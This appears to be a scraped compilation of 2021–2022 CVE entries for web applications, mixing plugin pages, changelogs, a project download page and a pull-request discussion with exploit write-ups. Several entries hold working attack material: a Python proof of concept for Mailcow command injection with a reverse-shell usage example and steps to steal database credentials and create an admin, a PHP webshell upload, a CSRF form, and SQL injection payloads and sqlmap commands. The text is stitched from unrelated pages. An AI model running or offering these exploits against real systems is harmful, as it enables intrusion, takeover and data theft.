Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in ibericode's MC4WP plugin <= 4.8.6 at WordPress.

CVE-2021-36833: MC4WP: Mailchimp for WordPress

Cross-Site Scripting (XSS) vulnerability in WP Wham's Checkout Files Upload for WooCommerce plugin <= 2.1.2 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Checkout Files Upload for WooCommerce plugin lets your customers upload files on (or after) WooCommerce checkout.

**Features**

Set field’s **position** on WooCommerce checkout page:

*   Before checkout form.
*   After checkout form.
*   Do not add on checkout.

Set if file upload **is required**.

If you need files to be uploaded after order is created, you can optionally add field to:

*   WooCommerce **Thank You** (i.e. **Order Received**) page.
*   WooCommerce **My Account** page.

Add custom **label** to the field.

Set **accepted file types**.

Set custom Upload and Remove **button labels**.

Set **custom messages**:

*   “Wrong file type”.
*   “Wrong image dimensions” and “Couldn’t get image dimensions”.
*   “File is required”.
*   “File was successfully uploaded”.
*   “No file selected”.
*   “File was successfully removed”.

Optionally set field to show up only if in cart there are selected:

*   **Products**.
*   **Product categories**.
*   **Product tags**.

Add uploaded files to admin and customers **emails**.

Send **additional emails** if user uploads or removes files on “Thank You” or “My Account” pages.

**Customize** the frontend files upload form.

Optionally enable **AJAX form** for file uploads.

Set **max file size** option.

Optionally **validate image dimensions**.

**Feedback**

*   We are open to your suggestions and feedback. Thank you for using or trying out one of our plugins!
*   Drop us a line at www.wpwham.com.

**More**

*   Visit the Checkout Files Upload for WooCommerce plugin page.

1.  Upload the entire plugin folder to the /wp-content/plugins/ directory.
2.  Activate the plugin through the “Plugins” menu in WordPress.
3.  Start by visiting plugin settings at “WooCommerce > Settings > Checkout Files Upload”.

This plugin it might be very helpful if, for some reason, you have to let customers upload files during the checkout.

The free version of this plugin is just brilliant! The UI is very easy to understand, making it pretty straightforward to configure. We needed to have an upload field on the Checkout so customers could attach a PDF file. The file can be included as an actual email attachment, and not just a link. It also has the ability to include the upload field conditionally, meaning you can link it to a specific product on the backend, and it will just show if that product is in cart. I have tested multiple checkout upload plugins over the last few months. This is HANDS DOWN the BEST plugin of its kind on the market.

The free version of the plugin does much more than other paid plugins do. So many possibilities for customisation.

I have been facing a problem from three days on order at checkout file upload attachment not showing in mail .it was working fine before. kindly help me . https://fastprintamman.com/ palce a order and on check out there is file upload that attachment not showing in admin mail

Is it possible to set MINIMUM dimensions for both height and width? Also, the progress meter doesn't seem to actually reflect the upload progress... It just jumps to 100% almost immediately...

Read all 10 reviews

“Checkout Files Upload for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    WP Wham

**2.1.3 – 2022-05-10**

*   FIX: escape filenames on order confirmation/thank you pages.

**2.1.2 – 2021-12-23**

*   FIX: potential XSS vulnerability (thanks to Vlad at Patchstack).
*   FIX: minor display bug in settings due to WooCommerce update.

**2.1.1 – 2021-09-16**

*   UPDATE: PHP 8 now officially supported.
*   UPDATE: updated .pot file for translations.

**2.1.0 – 2021-04-15**

*   NEW: added more options to “validate image dimensions” setting: “greater than or equal”, and “less than or equal”.
*   NEW: added button to delete file attachments on admin “edit order” page. (If you don’t want the ability to delete files, you can use the filter wpwham_checkout_files_upload_allow_admin_delete_files to disable it).
*   FIX: check if server’s temporary directory is writeable. If not, display an error message. (Solves an issue with 0-byte files being uploaded).
*   FIX: bug where sometimes 0-byte files were attached to order emails.
*   UPDATE: for text labels/notices, made it possible for a translated string to take precedence over stored settings. (Previously it was the other way around. This should now make things easier if you use a translation plugin like LocoTranslate, Polylang, etc).
*   UPDATE: performance improvement — load our admin assets only when needed.
*   UPDATE: updated .pot file for translations.

**2.0.4 – 2021-01-12**

*   FIX: clean output buffer before downloads (solves conflict with some 3rd-party plugins which interfere with the output buffer, causing downloads to appear as empty or corrupt).

**2.0.3 – 2020-09-17**

*   UPDATE: display our settings in WC status report.

**2.0.2 – 2020-08-21**

*   FIX: upload button translation issue (removed old label settings, added new ones).
*   UPDATE: updated .pot file for translations.

**2.0.1 – 2020-06-17**

*   FIX: issue with upload button not working in certain themes.
*   FIX: user permissions issue incorrectly preventing downloading of images from the WP admin side.
*   FIX: JS typo.

**2.0.0 – 2020-06-11**

*   NEW: **Breaking Change** the Form (simple) template has been removed, and Form (AJAX) is now the standard template. Form (AJAX) has been the default since v1.4.0 (2018-08-25), so for most people this change will have no effect. However, if you were using Form (simple), or if you had customized either template, please double check your settings to make sure things look correct. Or, you can reset the settings to get a fresh start.
*   NEW: **Breaking Change** in template settings, the variable %field_html% which previously contained BOTH the field html AND the upload button itself, has been split into separate variables %field_html% and %button_html%. Your template settings will be updated automatically to reflect this.
*   NEW: image thumbnails will be shown by default. The image feature has existed since v1.4.0 (2018-08-25), but some people didn’t realize this and/or didn’t know they needed to add %image% into the template to enable it. Now %image% is included in the template by default. If you don’t want this, simply edit your template settings and remove the %image% variable.
*   NEW: show spinner when processing, and prevent checkout form submission before upload is completed.
*   UPDATE: change the way we handle sessions — only start them when needed, not on every page load.
*   UPDATE: extensive code refactoring.
*   UPDATE: updated some styling and text. For example, progress bars (if enabled) are now green.
*   UPDATE: updated .pot file for translations.

**1.5.4 – 2020-01-14**

*   UPDATE: add new filters ‘wpw\_checkout\_files\_upload\_form\_html’ and ‘wpw\_checkout\_files\_upload\_form\_ajax\_html’.
*   UPDATE: wrap checkout page file upload controls in

<

div>.

**1.5.3 – 2019-11-22**

*   UPDATE: bump tested versions

**1.5.2 – 2019-11-15**

*   UPDATE: bump tested versions

**1.5.1 – 2019-09-12**

*   UPDATE: bump tested upto versions

**1.5.0 – 2018-10-08**

*   FIX: php notice
*   UPDATE: updated .pot file for translations

**1.4.5 – 2018-10-01**

*   Dev – [alg_wc_cfu_translate] shortcode added and do_shortcode() is now applied to each file’s “Labels”.

**1.4.4 – 2018-09-13**

*   Dev – Emails – “Additional Emails Options” subsection added.
*   Dev – “Raw” input is now allowed in all textarea admin settings fields.
*   Dev – Code refactoring – “Reset” function re-written.
*   Dev – Code refactoring – custom_number_checkout_files_upload settings type removed.
*   Dev – “Your settings have been saved” admin notice added.

**1.4.3 – 2018-09-10**

*   Dev – “Author URI” updated.

**1.4.2 – 2018-09-10**

*   Dev – “Contributors” updated.

**1.4.1 – 2018-08-27**

*   Fix – %image% in AJAX form fixed on “Thank you” and “My Account” pages.
*   Dev – “Validate image dimensions” options added for each file.
*   Dev – Minor code refactoring.
*   Dev – Minor admin settings restyling.

**1.4.0 – 2018-08-25**

*   Fix – User file download fixed on “Thank you” and “My Account” pages.
*   Dev – %image% replaced value added.
*   Dev – “AJAX form” now is enabled (yes) in settings by default.
*   Dev – Code refactoring.
*   Dev – Minor admin settings restyling.
*   Dev – Plugin URI updated.

**1.3.0 – 2018-06-09**

*   Fix – Case insensitive comparison of the “Accepted file types” options.
*   Fix – Default values fixed for all get_option() calls.
*   Dev – “AJAX form” options added.
*   Dev – “Max file size” options added.
*   Dev – Filter rewritten.
*   Dev – Admin settings – “Reset settings” section added.
*   Dev – Admin settings – Files settings added as separate sections.
*   Dev – Admin settings – Minor changes: restyling; select option type changed to wc-enhanced-select; settings array saved as main class property.

**1.2.0 – 2017-05-10**

*   Fix – Call to undefined function is_shop_manager() error fixed.
*   Dev – WooCommerce v3.x.x compatibility – Order ID – using function instead of accessing property directly.
*   Dev – load_plugin_textdomain moved to constructor from init hook.
*   Dev – Plugin link changed from http://coder.fm to https://wpcodefactory.com.

**1.1.1 – 2016-12-07**

*   Dev – alg_current_filter_priority() modified for compatibility with WordPress since v4.7.
*   Dev – Language (POT) file updated.
*   Dev – Checking for Pro modified.

**1.1.0 – 2016-11-28**

*   Dev – “Form Template Options” settings section added.
*   Dev – Language (POT) file added.
*   Dev – “Emails Options” settings moved to separate section.

**1.0.0 – 2016-09-05**

*   Initial Release.

CVE-2022-29425: Checkout Files Upload for WooCommerce

Sourcecodester Covid-19 Directory on Vaccination System1.0 is vulnerable to SQL Injection via the admin/login.php txtusername (aka Username) field.

Submitted by Walterjnr1 on Monday, March 28, 2022 - 10:03.

****Introduction****

The aim of the study is to design a COVID-19 information management system that will accurately store and retrieve information on covid-19 vaccination in order to control the spread of the pandemic. This project was developed using **PHP Language** as the backend and **MySQL Database**. The application is a web-based platform to verify the vaccination record of the individual online.

It contains modules like:

****About the Covid-19 Directory on Vaccination System****

I developed this project using the following:

*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Bootstrap**

This **Covid-19 Directory on Vaccination System** can be accessed by the Public users and the management. The management has the privilege to access the admin/management panel of the system. The management side of the system requires the users to log system credentials in order to gain access to the records and manage it. The individuals can simply register to the system by filling all the fields that are required at the public site. To verify the individual's vaccination record and status, the user can navigate the site to Verification Panel and enter the Vaccination ID of the person. Upon submitting the Individual's Vaccination ID, the vaccination information of the individual will be shown.

****Features********Public****

*   **Home Page**
*   **Registration Form**
*   **Verification Panel**

****Admin****

*   **Login and Logout**
*   **Manage User Records**
*   **List all Records**
*   **Print Records**
*   **Update Account Credentials**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Open** a browser and **browse** the **PHPMyAdmin. i.e** **http://localhost/phpmyadmin**
5.  **Create** a **new database** naming ****covid19****.
6.  **Import** the provided ****SQL**** file. The file is known as ****covid19.sql**** located inside the **db** folder.
7.  **Browse** the **Covid-19 Directory on Vaccination System** in a **browser**. i.e. ****http://localhost/covid-19-vaccination/**** for the public site and ****http://localhost/covid-19-vaccination/admin**** for the management site.

**Admin Default Access:**

Username: **admin**  
Password: admin123

**DEMO VIDEO:**

That's it. You can now explore the features and functionalities of this **Covid-19 Directory on Vaccination System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

For your research project contact us via Whatsapp on +2348067361023 or email us via: \[email protected\] or visit www.leastpayproject.com.ng

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1214 views

CVE-2022-28531: Design and Implementation of Covid-19 Directory on Vaccination System in PHP Source Code

Nextcloud Deck is a Kanban-style project & personal management tool for Nextcloud, similar to Trello. The full path of the application is exposed to unauthorized users. It is recommended that the Nextcloud Deck app is upgraded to 1.2.11, 1.4.6, or 1.5.4. There is no workaround available.

> I agree that proper hints may be a alternative solution, but i doubt the order of the implementation. This should be done first and then remove any trace that might lead to a solution.

As Lukas mentioned the trace may contain path and folder structures but depending on the server configuration and PHP version may also contain arguments of method calls.

> If one would prioritize clear hints higher than removing all information i wouldn't even have an issue, but in fact by far most of the users will complain at the Android client if an issue occurs.

Your point if of course understandable. Nextcloud offers a hint exception in order to provide user facing texts but that is so far not used in deck unfortunately. I'll open a follow up ticket on how we can improve exception handling in general as we indeed should rather catch them in the controller and return predictable API responses then. However that is unfortunately a larger restructuring task, so this is why this PR was the first take on the topic. I'll have a look if we can get some static analysis that we have running with psalm to get a list of uncatched exceptions that the controllers might throw so we can properly align that in a follow up.

> I have a feeling that we are some kind of first level support / first line of defense and i feel a bit lost if we only are able to comment "sorry, but no idea - ask your million users hoster to enable debug mode for you shrug".

For now I've extended the message that will be returned in non-debug mode to always contain a hint to further request the server administrator for help in addition with the request ID which can then be used to get the actual log entry. This is the same behavior that we have in Nextcloud on pages that throw an exception.

CVE-2022-24906: Keep exceptions http response generic by juliushaertl · Pull Request #3384 · nextcloud/deck

mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.

**Mailcow CVE-2022-31245**

CVE-2022-31245: RCE and Domain Admin privilege escalation for Mailcow. Including POC.  

Patched Version: https://github.com/mailcow/mailcow-dockerized/releases/tag/2022-05d  
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31245

**CVE-2022-31245: Command Injection, RCE**

Severity: 3/3  
Type: Command Injection, RCE, Domain Takeover  
Affected versions: least 2019 - 2022-05c  

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell using a command injection in imapsync. Using this vunerability a attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on release as of 2022-05c. Patched in 2022-05d.

**Technical overview**

Using the steps below the vulnerability can be recreated.

Gaining shell:

1.  Go to the Mailcow login page (not SOGo)
2.  Login as a regular user
3.  Go to Sync Jobs
4.  Set the following values: hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --PIPEMESS=CMD Where the field "Custom Parameters" is the important field. CMD can be a arbitrary shell command without spaces. Using uppercase is important!
5.  Press save and wait 1 min for the command to execute.

Custom Parameters example payload:

    --debug --nosslcheck --PIPEMESS=touch${IFS}test.txt
    

CMD cannot contain space,quotes or slashes use ${IFS} instead of space. Uppercase for --PIPEMESS is important to bypass check in functions.mailbox.inc.php at line 340:

if (strpos($custom\_params, 'pipemess')) {
	$custom\_params = '';
}

This uppercase command still works due to the fact that imapsync is case insensitive.

Privilege Escalation:

1.  After gaining shell on the dovcot container run env
2.  Find DBUSER and DBPASS
3.  Login to database using mysql and credentials
4.  Create new admin user or create a new admin API-key

**Proof-of-Concept, POC**

Automated POC. POC could in some cases need modification to run against non-local Mailcow instances.

#!/bin/python3

description \= """
Mailcow authenticated RCE. Only for educational purposes!!
By: ly1g3\[at\]tuta.io
This exploit can be used to get mailcow domain admin using mysql credentials found in "env" after getting shell.
Quotes, spaces and slash cant be used in cmd. Use ${IFS} as space. End command with ; is recommended.
Example reverse shell use: --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;' where PYTHON\_REVERSE\_SHELL\_BASE64 is python reverse shell.
Example usage: ./mailcow\_poc1.py --url https://192.168.1.2 --user test@local.com --passwd testpass --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;'
"""

import requests
import urllib
import sys
from urllib.parse import urlparse
import argparse
from argparse import RawTextHelpFormatter
from datetime import datetime

parser \= argparse.ArgumentParser(description\=description, formatter\_class\=RawTextHelpFormatter)
parser.add\_argument('--url', help\='Url to the mailcow server', required\=True)
parser.add\_argument('--user', help\='Mailcow username, example test@mailcow.com', required\=True)
parser.add\_argument('--passwd', help\='Mailcow user password', required\=True)
parser.add\_argument('--cmd', help\='Command to execute', required\=True)

args \= parser.parse\_args()

base\_url \= args.url
\# hostname = urlparse(base\_url).netloc
hostname \= '127.0.0.1'
user \= args.user
password \= args.passwd
cmd \= args.cmd

\# Get the required csrf token
def find\_csrf\_token(text):
    try:
        start1 \= text.index("var csrf\_token")
        start2 \= text.index("'", start1)
        end2 \= text.index("'", start2+1)
        csrf\_token \= text\[start2+1:end2\]
        return csrf\_token
    except:
        return ""

login\_url \= base\_url + '/'

s \= requests.Session()

\# Login
r1 \= s.post(login\_url, data\={'login\_user': user, 'pass\_user': password}, verify\=False)

token \= find\_csrf\_token(r1.text)
if not token:
    print("Error no token found, login problems?")
    sys.exit(0)
print(f"CSRF token: {token}")

sync\_url \= base\_url + '/api/v1/add/syncjob'

\# Create sync job with command injection
attr \= f'{{"host1":"{hostname}","port1":"143","user1":"{user}","password1":"{password}","enc1":"PLAIN","mins\_interval":"1","subfolder2":"","maxage":"0","maxbytespersecond":"0","timeout1":"10","timeout2":"10","exclude":"(?i)spam|(?i)junk","custom\_params":"--debug --nosslcheck --PIPEMESS={cmd}","subscribeall":"1","active":"1","csrf\_token":"{token}"}}'
r2 \= s.post(sync\_url, data\={'attr': attr, 'csrf\_token': token}, verify\=False)

c \= r2.content
if c.find(b"mailbox\_modified") != \-1:
    print("Success, rule modified")
elif c.find(b"object\_exists") != \-1:
    print("ERROR: Object exists, remove existing rule before running this")
    print(c)
    sys.exit(0)
else:
    print("ERROR: Something went wrong")
    print(c)
now \= datetime.now()
current\_time \= now.strftime("%H:%M:%S")
print("Command may take 1min to execute...")
print(f"Done at: {current\_time}")

CVE-2022-31245: GitHub - ly1g3/Mailcow-CVE-2022-31245: CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow

A Cross-Site Request Forgery (CSRF) in Online Banquet Booking System v1.0 allows attackers to change admin credentials via a crafted POST request.

# Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Description :The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request.# HTTPS Request :POST /obbs/admin/admin-profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 86Origin: http://localhostConnection: closeReferer: http://localhost/obbs/admin/admin-profile.phpCookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3eUpgrade-Insecure-Requests: 1adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=# Poc Html :<html>    <body>  <script>history.pushState('', '', '/')</script>    <form action="http://localhost/obbs/admin/admin-profile.php" method="POST">      <input type="hidden" name="adminname" value="Admin" />      <input type="hidden" name="username" value="admin" />      <input type="hidden" name="email" value="admin@gmail.com" />      <input type="hidden" name="mobilenumber" value="123" />      <input type="hidden" name="submit" value="" />      <input type="submit" value="Submit request" />    </form>  </body></html>

CVE-2022-28992: Online Banquet Booking System 1.0 Cross Site Request Forgery ≈ Packet Storm

Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.

    # Exploit Title: Pharmacy management system - Remote Code Execution (RCE)# Date: 19/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Exploit  :  You can upload a php shell file as a productImage# ------------------------------------------------------------------------------------------#                                           POC# ------------------------------------------------------------------------------------------# Request sent as base userPOST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631Content-Length: 559Connection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneelUpgrade-Insecure-Requests: 1-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="old_image"-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="productImage"; filename="shell.php"Content-Type: image/jpeg<?phpif($_REQUEST['s']) {  system($_REQUEST['s']);  } else phpinfo();?></pre></body></html>-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="btn"-----------------------------208935235035266125502673738631--# ResponseHTTP/1.1 302 FoundDate: Tue, 19 Apr 2022 20:43:17 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cachelocation: ../product.phpContent-Length: 77Connection: closeContent-Type: text/html; charset=UTF-8Image uploaded successfully{"success":true,"messages":"Successfully Updated"}# ------------------------------------------------------------------------------------------#                                   Request to webshell# ------------------------------------------------------------------------------------------GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel# ------------------------------------------------------------------------------------------#                                    Webshell response# ------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Tue, 19 Apr 2022 20:55:58 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Content-Length: 33Connection: closeContent-Type: text/html; charset=UTF-8…0xSaudi</pre></body></html>

CVE-2022-30887: Pharmacy Management System 1.0 Shell Upload ≈ Packet Storm

School Dormitory Management System v1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /dms/admin/reports/daily_collection_report.php.

    # Exploit Title: School Dormitory Management System - 'month' SQL Injection# Date: 08/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 59 in file "/dms/admin/reports/daily_collection_report.php"$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");# Sqlmap command:sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: month (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report    Type: UNION query    Title: Generic UNION query (NULL) - 11 columns    Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

CVE-2022-30886: School Dormitory Management System 1.0 SQL Injection ≈ Packet Storm

ChatBot Application with a Suggestion Feature 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /simple_chat_bot/admin/responses/view_response.php.

CVE-2022-30518

Simple Student Quarterly Result/Grade System v1.0 was discovered to contain a SQL injection vulnerability via /sqgs/Actions.php.

    # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Linux 
    
    
    
    
    # Vulnerable Code
    
    line 57 in file "/sqgs/Actions.php"
    
    @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
    
    
    Steps To Reproduce:
    * - Go to the login page http://localhost/sqgs/login.php
    
    Payload:
    
    username: admin ' or '1'='1'#--
    password: \
    
    
    
    Proof of Concept :
    
    POST /sqgs/Actions.php?a=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 51
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/sqgs/login.php
    Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
    
    username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

Tag

#php